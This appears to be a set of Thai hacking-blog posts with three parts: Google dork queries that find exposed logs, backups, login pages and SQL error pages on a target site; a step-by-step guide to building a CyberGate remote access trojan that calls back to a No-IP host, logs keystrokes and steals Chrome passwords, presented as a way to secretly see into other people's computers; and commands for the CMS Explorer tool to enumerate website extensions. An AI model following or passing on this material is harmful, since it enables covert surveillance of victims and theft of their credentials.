ค้นหา log files
site:target+ext:log
###############################################################
ค้นหา backup files
site:target+ext:bkf+|+ext:bkp+|+ext:bak+|+ext:old+|+ext:backup
###############################################################
ค้นหาหน้า login
https://www.google.com/search?q=site:target+inurl:login
###############################################################
ค้นหาหน้าที่เกิด SQL Error ต่างๆ
https://www.google.com/search?q=target+intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near" | intext:"unexpected end of SQL command" | intext:"Warning: mysql_connect()" | intext:"Warning: mysql_query()" | intext:"Warning: pg_connect()"
###############################################################
ค้นหาเอกสารที่เปิดเผย
site:target+ext:doc+|+ext:docx+|+ext:odt+|+ext:pdf+|+ext:rtf+|+ext:sxw+|+ext:psw+|+ext:ppt+|+ext:pptx+|+ext:pps+|+ext:csv
###############################################################
ค้นหาหน้า phpinfo
https://www.google.com/search?q=site:target+ext:php intitle:phpinfo "published by the PHP Group"
###############################################################
++++++++++ Online Service ++++++++++
###############################################################
[บทความ] AK1 - basic-hack.blogspot ดอทคอม
###############################################################
Read more

Hack แอบเข้าไปดูคอมคนอื่นด้วย CyberGate [Eng TUT]

Setting Up No-IP

1. Go to http://www.No-ip.com

2. Create an account, confirm your account through your email, then log in. Click Add Host.
3. Now name your host whatever you want. For example I will name my host gtech.servegame.com. Just follow these settings and press Create Host.
4. Now go here - https://www.no-ip.com/downloads.php and download No-IP's Dynamic DNS Update Client if you haven't already.
5. Once downloaded, install it. Then open it up and put in your account email and password.
6. Click Select Hosts - Click the box to check mark your host - Then press Save.
It should look something like this:
7. Click the X in the top right corner to minimize No-IP to your taskbar.
You are now finished setting up No-IP!

2. Setting Up CyberGate

1. Download CyberGate and open it. You can download CyberGate from their official website here -http://www.multiupload.com/3TLCUV4FZD
2. Now click Control Center - Start and do the following:
You are now done with setting up CyberGate!

3. Building Your CyberGate Server


1. Click Control Center - Builder - Create Server. Make a user named Hacker and press Ok.

2. Mark the user "Hacker" And press Forward.
3. Press 127.0.0.1 | Port 999 and press Delete:
4. After that, Click Add.

5. A Box should pop up saying: 127.0.0.1:81. Remove everything and change it with the No-ip address host you added. So let's say you used example.servegame.com. Change 127.0.0.1:81 to example.servegame.com:82. So it should look like this:


6. Now Change the
Identification: remote
Password: cybergate

To This:

Identification: Cyber
Password: 123456

7. Go to the next tab "Installation" and use the exact same settings as i do:

8. Now Skip the Message, Keylogger, and Anti Debug tabs, since these are already set up right for us.
9. In the Create Server tab use the exact same settings checked as I do.

Except Google Chrome Passwords is optional. It steals Google Chrome Passwords. If you would like to have it checked like I do, go tohttp://000webhost.com and create a free account. Verify your email then wait around 2 minutes for your status to change to Active. Then click go to CPanel. Scroll down and click File Manager. Then go in public html. Click upload and upload sqlite3.dll (it is located in the same folder cybergate is located on your computer). Then once you check Google Chrome Passwords on Cybergate it will ask for a link, put in http://username.comeze.com/sqlite3.dll


10. Press Create Server and save the settings.
You are now done creating you server!

4. Forwarding Your Ports, If You Have Not Done So

Your now going to have to forward port 82 on your router if you have not done so, this is how:

1. Click Start on your computer and click Run. If you have Vista and I think Windows 7, you need to search Run in the search bar in the start menu, then click Run.

2. Type cmd and hit enter.
3. type ipconfig and press enter.
4. You should see something like this, write down or remember these last digits that I selected in the picture below:

5. Now go to http://www.portforward.com
6. Scroll down and select your router.
7. Scroll down and you should see a bunch of programs, click "1st SMTP Server"
8. You should see at the top telling you to enter your static IP
9. Type in the digits I had you remember in step 4. My digits were 114 so I entered that.
10. Now just follow the tutorial, but when it says forward port 25, forward port 82 instead.
11. Once you are done, go to http://www.canyouseeme.org
12. Type in 82 in the box next to "What Port?" and click check.
13. If you got "Error: I could not see your service on IP ADDRESS HERE on port (82) Reason: Connection refused" Make sure your firewall is off and try again.
14. You should get "Success: I can see your service on ADDRESS HERE on port (82) Your ISP is not blocking port 82"

Port 82 should now be open!

You are now done with everything, have fun using CyberGate!
Credits go to "Gtech" at HackForums.Net
Read more

พื้นฐานแฮกเกอร์ ตอน โปรแกรมตรวจสอบเว็บไซต์ที่เป็น CMS

Cms explorer คือโปรแกรมที่แฮกเกอร์ นิยมใช้สำหรับค้นหา Component , Modules , Plugin , Theme ของเว็บไซต์ cms (เว็บไซต์สำเร็จรูป)



อันดับแรกอธิบายศัพท์ในบทความนี้ 
เป็นความรู้สำหรับมือใหม่กันก่อน

CMS (Content Management System) คือ
ระบบจัดการเนื้อหาที่พัฒนามาจากภาษาที่ใช้เขียนเว็บไซต์โดยทั่วไปอย่าง php,asp,jsp,python,perl ลฯล
ออกแบบมาแบบสำเร็จรูป ให้ผู้ที่ต้องการเปิดเว็บไซต์นำมาใช้งานกันได้ทันที และสะดวกรวมเร็ว มีความสามารถการจัดการข้อมูลตามประเภทของเว็บไซต์  โดยที่ผู้ติดตั้งไม่ต้องมีความรู้เรื่องการเขียนโปรแกรมมากนัก ปัจจุบันที่พบเจอบ่อยๆจนติดตา ก็คงเป็น Wordpress , joomla , drupal , SMF , discuz เป็นต้น  ( เพิ่มเติม CMS ที่พัฒนาโดยคนไทย http://www.cmsthailand.com )

CMS แต่ละตัวจะมี Extension ก็คือส่วนเสริมของแต่ละ cms
ซึ่งปกติ cms อย่าง joomla จะไม่มี Webboard มาให้ก็ต้องมาติดตั้งระบบเว็บบอร์ด..นี่คือ Extension เสริม

โดยในส่วน Extension เรียงจากส่วนที่ใหญ่ๆ ไปหาเล็ก
จะได้ > Component , Module , Plugin
==================================================
ความรู้เรื่อง Extensions 4 ประเภท = Component , Module , Plugin ,Template
==================================================

สรุปช่องโหว่ที่ทำให้แฮกเกอร์ สามารถแฮกเว็บไซต์ได้ 
อาจเกิดขึ้นได้ทั้ง 4 ส่วนนี้.....หากติดตั้งเพิ่มโดยไม่มีการเช็คช่องโหว่หรือทดสอบด้วยตัวเองก่อน *0*

ตัวอย่างช่องโหว่ที่เกิดขึ้นให้มองเห็นภาพ
(Joomla redSHOP Component 1.2 - SQL Injection)
(PHP-Nuke Module(SPChat) SQL Injection)
(Wordpress Formcraft Plugin - SQL Injection)

==================================================
Cms Explorer
เป็นเครื่องมือที่ใช้ในการค้นหาที่อยู่ของ Extension ทั้ง 4 ส่วนที่กล่าวมา
ที่สำคัญเป็นโปรแกรมภาษา perl  (.pl) ดังนั้นเพื่อให้ใช้งานไฟล์ .pl ได้ ต้องติดตั้ง ActivePerl กันก่อนครับ

ดาวน์โหลดจากเว็บไซต์ผู้พัฒนาตัวจริง
ลดความเสี่ยงการโดนแฮก
Download Cms Explorer
https://code.google.com/p/cms-explorer/
Download ActivePerl
http://www.activestate.com/activeperl

สำหรับแอดมินทั้งหลายควรตรวจสอบช่องโหว่ของส่วนเสริมก่อนติดตั้งด้วยครับ
แนะนำให้อ่านบทความนี้เพิ่มเติม > http://basic-hack.blogspot.com/2013/03/exploit-cms-plugin.html
==================================================
วิธีการใช้งาน CMS Explorer เบื้องต้น

/cms-explorer.pl -url www.wordpress.com -type wordpress
/cms-explorer.pl -url www.drupal.com -type drupal
/cms-explorer.pl -url www.joomla.com -type joomla

ปล.ถ้าอยากเก่ง แนะนำหัดแปลอังกฤษบ่อยๆนะจ๊ะ
https://code.google.com/p/cms-explorer/wiki/Usage
==================================================
บทความ ak1 - basic-hack.blogspot ดอทคอม
==================================================
Read more
X คอร์สเรียนแฮกเกอร์ - Hacker-Security (Online course and Ebook)